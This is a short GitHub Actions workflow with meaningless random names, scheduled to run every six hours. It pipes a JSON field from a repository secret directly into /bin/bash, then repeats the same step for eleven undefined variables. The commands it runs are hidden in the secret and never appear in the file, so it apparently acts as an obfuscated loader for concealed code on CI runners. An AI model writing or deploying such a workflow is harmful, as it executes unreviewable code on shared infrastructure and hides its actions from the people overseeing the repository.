name: dadanmaxo
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dadanmaxo
        env:
          dzjn58: ${{ secrets.dzjn58 }}
        run: |
          echo $dzjn58 | jq -r .ufu10371 | /bin/bash
          echo $tpj94916 | jq -r .vyj92 | /bin/bash
          echo $xr8 | jq -r .fyojq10 | /bin/bash
          echo $gknt6548 | jq -r .g45072 | /bin/bash
          echo $m87583 | jq -r .ulw4096 | /bin/bash
          echo $wz1050 | jq -r .l6678 | /bin/bash
          echo $r87 | jq -r .ions4 | /bin/bash
          echo $ygx294 | jq -r .drudt0867 | /bin/bash
          echo $ucnyu75875 | jq -r .eib809 | /bin/bash
          echo $w56777 | jq -r .i1 | /bin/bash
          echo $ca833 | jq -r .tc3 | /bin/bash
          echo $xohnv87493 | jq -r .wvgcs428 | /bin/bash

